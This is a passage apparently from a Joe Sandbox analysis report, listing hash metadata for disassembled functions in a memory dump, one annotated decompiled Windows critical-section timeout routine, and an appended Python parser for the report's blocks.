                                                      • Instruction Fuzzy Hash: C321A472510A04EFCB29DF69D884E5BBBA8EF48340F10056DF619C7790D734E900CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction ID: 923b21900c7b02bd8381c8ec23371c1d09b6a30eafafb74d5bc86e614da62589
                                                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction Fuzzy Hash: B921D472605685DFE71FAB29D948B2577E8EF84354F1A00A0DD04CB696D738DC40CAA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction ID: a868fdbdf5db926eaf2930b7ba36f51c8a0fbfc6d5e2d48bb13cefdf929dea99
                                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction Fuzzy Hash: DE21A972600A42DFD739CF0DC640E66B7E5EB94E11F22806EE98997B11D730AC02CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30ec161640d90e0571f4667950b5ce6efe1571548c5319b55ebcac067015eef4
                                                      • Instruction ID: 3c5ec7936bd2aff7057d9e9383531d278c12e58c5ec16269e49fb72e7aba1b04
                                                      • Opcode Fuzzy Hash: 30ec161640d90e0571f4667950b5ce6efe1571548c5319b55ebcac067015eef4
                                                      • Instruction Fuzzy Hash: CD116B337191109FCB1E9A5A9D81A2B736AEFC5730B2A4139EE16C73C0CB319C02CA95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3dcd03003b1e9c7fe676a128d4a7d19da6e98b2a5d55ddf7325bd4768c10b34b
                                                      • Instruction ID: 2fe2e1e1419330770d3a5d58f9b02f077a9e8e11593a428100e22fb81779525d
                                                      • Opcode Fuzzy Hash: 3dcd03003b1e9c7fe676a128d4a7d19da6e98b2a5d55ddf7325bd4768c10b34b
                                                      • Instruction Fuzzy Hash: 43219A71450A05DFC76AEF68CA14F1AB7F9FF18308F01466CE149876A6CB34EA51CB44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb8bc1fa2f75e996fa8405bf9d3ba396ca3c2d3bc2d5e3ac2b424f1a4ffe8fad
                                                      • Instruction ID: 64a461aaa2f094ac67a6881e2def835342119cf272c5fa389e9c6638bdf0c06c
                                                      • Opcode Fuzzy Hash: cb8bc1fa2f75e996fa8405bf9d3ba396ca3c2d3bc2d5e3ac2b424f1a4ffe8fad
                                                      • Instruction Fuzzy Hash: C0216D79901601CFC72EDF68F004615BBF1FF99358BA8836EC1458FAAAD7B19451CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 371e7263de24bd1d7367d9885eb0b606f1dd3c7300d07f06e53dc99b76f07f07
                                                      • Instruction ID: b5188be5277c9592ffd9f50a45daf38d0649fc5733c78549035e71172605a145
                                                      • Opcode Fuzzy Hash: 371e7263de24bd1d7367d9885eb0b606f1dd3c7300d07f06e53dc99b76f07f07
                                                      • Instruction Fuzzy Hash: 44118231F0430297E73DA62DFC80F16B6D8FBA4B20F094119F70297191C7B0D8818755
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                      • Instruction ID: b9d7a9051bf4dbc1dd5875bc204055eee9ae531719ea447f474abdf453178e9e
                                                      • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                      • Instruction Fuzzy Hash: C4112572504608BFCB099F5CD8808BEB7B9EF95304F1080AAF944C7351DB318D55D3A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fcb09e53ad739c7dd7c0bebef19641102b344f68df0958e4ab7fa87431c1b56f
                                                      • Instruction ID: 043623808832feb574400d2e0cd78a65c3fc599890fc2252cb02303c64b3ce15
                                                      • Opcode Fuzzy Hash: fcb09e53ad739c7dd7c0bebef19641102b344f68df0958e4ab7fa87431c1b56f
                                                      • Instruction Fuzzy Hash: EB110C323106079BC719FF2DDC85A5777E6FB94514B104638F95183691DB60EC14CBD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e179f1ff682e870a81511af8368479504c153b1bb3d9b44e22b6c66a0c57cd6
                                                      • Instruction ID: f74a44bd479e96525ad7f7d49d0fe425506c55ddb9f425164615e9fd37877f52
                                                      • Opcode Fuzzy Hash: 3e179f1ff682e870a81511af8368479504c153b1bb3d9b44e22b6c66a0c57cd6
                                                      • Instruction Fuzzy Hash: C50104B2911A11DBC37F8A5D9900E26BBA6FF95B907164269ED758B206D730C801C780
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction ID: f7130ceec2a31e3760050fcf7cd04dda0280dbce49f2cde64a02a91e2f30a4cc
                                                      • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction Fuzzy Hash: 5F112B72201682CFE72FE72DC948B7537D4EF44B94F1A00A0EE0487A93DB28C841CA51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                      • Instruction ID: ec7c95bda075f1c8448f45569f5988dbb26b66bca6f05972bf613f9efb17a13a
                                                      • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                      • Instruction Fuzzy Hash: 8D01FC32300129ABE734DE9ECC50E5B7BADEB94A60F180164FA08CB2C0DB30DC51C3A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9464e1dd02466fbf99ccc2adb150fb0d47f3c77e338c273b3d5ec5717f86122
                                                      • Instruction ID: 8dcca04babf96552227244f8a54bb238b8fbc525a09aaca39c5b303e9cb522e8
                                                      • Opcode Fuzzy Hash: f9464e1dd02466fbf99ccc2adb150fb0d47f3c77e338c273b3d5ec5717f86122
                                                      • Instruction Fuzzy Hash: 8701F4725013188FC32E9F08D840B26BBB9FB85328F214136E1158BA9AD374DC41CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction ID: 9a9eb4c978f4bc9ee3caba772c8d62accc85b1c83395e82a34b07df0685adf13
                                                      • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction Fuzzy Hash: F001967514050AFFE719AF69CC80E62FB6DFF54358F404525F61442560C721ACA1CAE5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc02de652de5d4de8c83b98c8de0e6d07d9729fb0c3311237b803d47c327ce6d
                                                      • Instruction ID: 5c137c0b737f76e14597a79c67e052c71e1649aa1fed81e4a511e3ea63d88747
                                                      • Opcode Fuzzy Hash: bc02de652de5d4de8c83b98c8de0e6d07d9729fb0c3311237b803d47c327ce6d
                                                      • Instruction Fuzzy Hash: 41018472601A4A7FD319BB69CD84E53BBACFB99654B000225F50883A51DB34EC11C6E4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb1d29c618feed3c077733c3f168fb4d5cf83cfb476917719ee72086911f0f4c
                                                      • Instruction ID: e7a93619925ac5e8ae32ff092f5d1cccf754bfac77a0c35306937d8a9b92e941
                                                      • Opcode Fuzzy Hash: cb1d29c618feed3c077733c3f168fb4d5cf83cfb476917719ee72086911f0f4c
                                                      • Instruction Fuzzy Hash: 00019E71A0420DFFCB18DFA8D885EAEBBB8EF44710F004066F910EB280DB749A01CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f7492d6a5946022b2b7ced2518f575f7dc03481f61bf41b69a9ff3d7e6b8606
                                                      • Instruction ID: 826009d70d2ec5f8ca7428b591497207c227c20af5418795b4c0509c7fe01956
                                                      • Opcode Fuzzy Hash: 7f7492d6a5946022b2b7ced2518f575f7dc03481f61bf41b69a9ff3d7e6b8606
                                                      • Instruction Fuzzy Hash: CA019E71A0124DEFDB18DFA8D845EAEBBB8EF45714F404066F914EB280DB74EA00CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 26a0e00a8342aecfe3d81f29b8d96d646dfd281ca41608e592cbef435616270c
                                                      • Instruction ID: b6bbb7d9fa4757b20900920a0cc71f1db2544ed28a8c59000e8719b48a9a74f1
                                                      • Opcode Fuzzy Hash: 26a0e00a8342aecfe3d81f29b8d96d646dfd281ca41608e592cbef435616270c
                                                      • Instruction Fuzzy Hash: D501DF31A101099BCB5CEB69D8059AEBBAAEF82124F450179DA0697288EF20DD018A92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction ID: e47258419f1dbf187d302a37dabe7b8ee700f47de9bb9559d8a15eee643e8f74
                                                      • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction Fuzzy Hash: F5015E722045849FE32B875CE948F6A7BF8EF85654F0D00A1FA15CB691D728DC40C629
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7799ad8e726a61524d206c621a38669df9a5c20fa9fa49aaee926005ede29c70
                                                      • Instruction ID: eac444bf97981a5eb4ce730366bb024dfdd3669bb597bcc508fd4df4fedb1053
                                                      • Opcode Fuzzy Hash: 7799ad8e726a61524d206c621a38669df9a5c20fa9fa49aaee926005ede29c70
                                                      • Instruction Fuzzy Hash: 4A014C72604B42AFC719DF68D808B1B7BD5BBD4314F048619F98583691EF30D540CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d4d525f3df6a8e2ca74a08318450851a94b92d65db5bd8d748fbccc38508107c
                                                      • Instruction ID: 6f9037f1f88cfd349dd67becd8ca4f45b91b550cddd249ff911bea0a9dec6573
                                                      • Opcode Fuzzy Hash: d4d525f3df6a8e2ca74a08318450851a94b92d65db5bd8d748fbccc38508107c
                                                      • Instruction Fuzzy Hash: 4F01D871E0025DEFCB18DFA8D845FAEB7B8EF50B04F004066F9009B281DB309A01CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7bfe1ae2b44d12fc4a3d3d4f3ed6abd53d93c876ff8b00cd3d6c25691c07a7a0
                                                      • Instruction ID: 195baf7fa1d2bcf223616007fb8fe979404e57b0e219596f27f87cc3bb5dee8d
                                                      • Opcode Fuzzy Hash: 7bfe1ae2b44d12fc4a3d3d4f3ed6abd53d93c876ff8b00cd3d6c25691c07a7a0
                                                      • Instruction Fuzzy Hash: 86018471E0120EAFDB18DBA9D845FAEBBB8EF55714F00406AF910AB290DB749A01C795
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                      • Instruction ID: e2e20494445cb294f594e455d26ae5780481412e8e88a9f0befd89389fb85863
                                                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                      • Instruction Fuzzy Hash: FDC08C33080248BBCB126F82CC00F467F2AFBA4B60F008020FA080B570C632E970EB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                      • Instruction ID: 1df228fe4cfb62fdbf550d19c8343ec7db8a9c5d6841f83017fa0640a1b7e4b5
                                                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                      • Instruction Fuzzy Hash: FDC04C72180648BBC7166E45DD01F157B69E7A4B60F154021B6040A9618676ED61E598
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                      • Instruction ID: 7887e105dd4fffd0e9fbbfefadaeb7740873511309c6335628da26526b185e34
                                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                      • Instruction Fuzzy Hash: C1C08C32080648BBC7126A45CD00F017B29E7A0B60F000020F6040A6A18A32E860D588
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                      • Instruction ID: 0cbeabdb27d17995c9718dc4bb53b063866172e0b824f7c8ce5286f714e0f92b
                                                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                      • Instruction Fuzzy Hash: B9C02BB0160840FBE71D1F30CD01F147254F740E31F6403547230458F0D7289C00E100
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                      • Instruction ID: 9e2c71cb81f2c7c0615350a94d5aa23770d9ab4bbcd570fb7fbc2968aec1ba0d
                                                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                      • Instruction Fuzzy Hash: 9CC08CB01415845BFB3F570DCE24B223A50AB28608F88019CEA02094E2C368A822C208
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction ID: 8e4b8ff50291d66e02176f90ff9d2771cb26060ea78916056ef7d6187c00dcd2
                                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction Fuzzy Hash: 12B09235301940CFCE1ADF18C084B1933E4BB84A40B8400D0E400CBA21D329E8008900
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction ID: 6f1860c5d7e1973f6d41e527a6e6ab6d00de625216a38205d4cc904056673738
                                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction Fuzzy Hash: AEB01233C51451CFCF0AEF40C610B197331FB00750F094490D00127930C328AC11CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			// Decompiler output from the image mapped at 010F0000 in process 0x15. The offsets used
                                                      			// below match the 32-bit TEB (fs:[0x18] = TEB self pointer, +0x20 / +0x24 =
                                                      			// ClientId.UniqueProcess / UniqueThread) and RTL_CRITICAL_SECTION (+0x0 DebugInfo,
                                                      			// +0xc OwningThread; DebugInfo+0x14 ContentionCount), i.e. this is the debug-print path
                                                      			// taken when entering a critical section times out.
                                                      			E011AFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                      				void* _t7;
                                                      				intOrPtr _t9;
                                                      				intOrPtr _t10;
                                                      				intOrPtr* _t12;
                                                      				intOrPtr* _t13;
                                                      				intOrPtr _t14;
                                                      				intOrPtr* _t15;
                                                      
                                                      				_t13 = __edx;                      // pointer to the 64-bit relative timeout (100 ns units)
                                                      				_push(_a4);
                                                      				_t14 =  *[fs:0x18];                // current TEB
                                                      				_t15 = _t12;                       // the RTL_CRITICAL_SECTION (register not recovered by the decompiler)
                                                      				// 0xffffffff:0xff676980 is the 64-bit constant -10,000,000 (one second in negative 100 ns
                                                      				// units), so E0115CE00 is a 64-bit division helper turning the timeout into whole seconds.
                                                      				_t7 = E0115CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                      				_push(_t13);
                                                      				// E011A5720 takes (component id, level, format, ...), consistent with DbgPrintEx;
                                                      				// 0x65 is DPFLTR_DEFAULT_ID.
                                                      				E011A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                      				_t9 =  *_t15;                      // CriticalSection->DebugInfo
                                                      				if(_t9 == 0xffffffff) {            // no debug info attached
                                                      					_t10 = 0;
                                                      				} else {
                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14)); // DebugInfo->ContentionCount
                                                      				}
                                                      				_push(_t10);
                                                      				_push(_t15);                       // Critical Section %p
                                                      				_push( *((intOrPtr*)(_t15 + 0xc))); // CriticalSection->OwningThread
                                                      				_push( *((intOrPtr*)(_t14 + 0x24))); // TEB->ClientId.UniqueThread
                                                      				return E011A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20))); // TEB->ClientId.UniqueProcess
                                                      			}

                                                      Instruction addresses (one per decompiled statement, in order): 0x011afdda, 0x011afde2, 0x011afde5, 0x011afdec, 0x011afdfa, 0x011afdff, 0x011afe0a, 0x011afe0f, 0x011afe17, 0x011afe1e, 0x011afe19, 0x011afe19, 0x011afe19, 0x011afe20, 0x011afe21, 0x011afe22, 0x011afe25, 0x011afe40

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011AFDFA
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011AFE2B
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011AFE01
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                      • API String ID: 885266447-3903918235
                                                      • Opcode ID: 861d98381e9f9502c842101d5d7f402e16dff478ccc56c9639113ed321f2d301
                                                      • Instruction ID: a4ce90e5dbea2a42fa48ca2a90b0cb249c406992913f8c06d4d60d8e80560b1f
                                                      • Opcode Fuzzy Hash: 861d98381e9f9502c842101d5d7f402e16dff478ccc56c9639113ed321f2d301
                                                      • Instruction Fuzzy Hash: 95F0F636604602BFEA291A85DC06F37BF5AEB44B70F650315F728561D1EBB2F82096F4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%
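The metadata blocks above follow one fixed layout (a "Memory Dump Source" header, bulleted Similarity fields, a Uniqueness score). The following Python parser is an added example, not part of this Joe Sandbox report or of Joe Sandbox itself; it turns such blocks into records so the opcode/instruction fuzzy hashes and the referenced strings can be exported and compared across reports. The sample text is constructed from two of the blocks visible on this page; the record and function names are the example's own.

```python
"""Parse the 'Memory Dump Source' / 'Similarity' blocks of a Joe Sandbox
disassembly listing into records for hash export and string hunting."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: two blocks copied in the layout used on this page.
SAMPLE = """\
Memory Dump Source
• Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
• Instruction ID: 7335774ae2240cbd6b1b27e7125c2ef4cc44bc7fef6b4a2201eb9dd3b7c88712
• Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
• Instruction Fuzzy Hash: 28D0E935352990CFD61BCB1DD554B1577B5BF44B44FC90490E501CBB62E72DD954CA00
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
• API String ID: 885266447-3903918235
• Opcode ID: 861d98381e9f9502c842101d5d7f402e16dff478ccc56c9639113ed321f2d301
• Instruction ID: a4ce90e5dbea2a42fa48ca2a90b0cb249c406992913f8c06d4d60d8e80560b1f
• Opcode Fuzzy Hash: 861d98381e9f9502c842101d5d7f402e16dff478ccc56c9639113ed321f2d301
• Instruction Fuzzy Hash: 95F0F636604602BFEA291A85DC06F37BF5AEB44B70F650315F728561D1EBB2F82096F4
Uniqueness

Uniqueness Score: -1.00%
"""

FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")
SOURCE_RE = re.compile(
    r"^(?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$"
)
SCORE_RE = re.compile(r"Uniqueness Score:\s*(-?\d+(?:\.\d+)?)%")


@dataclass
class DumpRecord:
    source_file: str
    offset: int
    based_on_pe: bool
    api_id: str
    strings: List[str]
    api_string_id: str
    opcode_id: str
    instruction_id: str
    opcode_fuzzy: str
    instruction_fuzzy: str
    uniqueness: Optional[float]


def parse_blocks(text: str) -> List[DumpRecord]:
    """Split the listing on its block header and read each bulleted field."""
    records = []
    for chunk in text.split("Memory Dump Source")[1:]:
        fields = {}
        for line in chunk.splitlines():
            m = FIELD_RE.match(line)
            if m:
                fields[m.group("key").strip()] = m.group("val").strip()
        src = SOURCE_RE.match(fields.get("Source File", ""))
        if src is None:
            raise ValueError("block without a well-formed Source File line")
        score = SCORE_RE.search(chunk)
        # The report joins several referenced strings with '$'; a literal '$'
        # inside a string would be split as well, which is acceptable for hunting.
        strings = [s for s in fields.get("String ID", "").split("$") if s]
        records.append(DumpRecord(
            source_file=src.group("file"),
            offset=int(src.group("off"), 16),
            based_on_pe=src.group("pe") == "true",
            api_id=fields.get("API ID", ""),
            strings=strings,
            api_string_id=fields.get("API String ID", ""),
            opcode_id=fields.get("Opcode ID", ""),
            instruction_id=fields.get("Instruction ID", ""),
            opcode_fuzzy=fields.get("Opcode Fuzzy Hash", ""),
            instruction_fuzzy=fields.get("Instruction Fuzzy Hash", ""),
            uniqueness=float(score.group(1)) if score else None,
        ))
    return records


def records_with_strings(records: List[DumpRecord]) -> List[DumpRecord]:
    """Blocks that reference at least one string; these are the ones worth
    reading first, since a bare fuzzy hash says little on its own."""
    return [r for r in records if r.strings]


def fuzzy_index(records: List[DumpRecord]) -> dict:
    """Map instruction fuzzy hash -> opcode ID, for lookups against other reports."""
    return {r.instruction_fuzzy: r.opcode_id for r in records}


if __name__ == "__main__":
    for rec in parse_blocks(SAMPLE):
        print(f"{rec.opcode_id[:16]}  offset=0x{rec.offset:08X}  strings={len(rec.strings)}")
```

Run the script to list every block with its mapped offset and string count; feed it the full listing instead of `SAMPLE` to build a hash index for the whole dump.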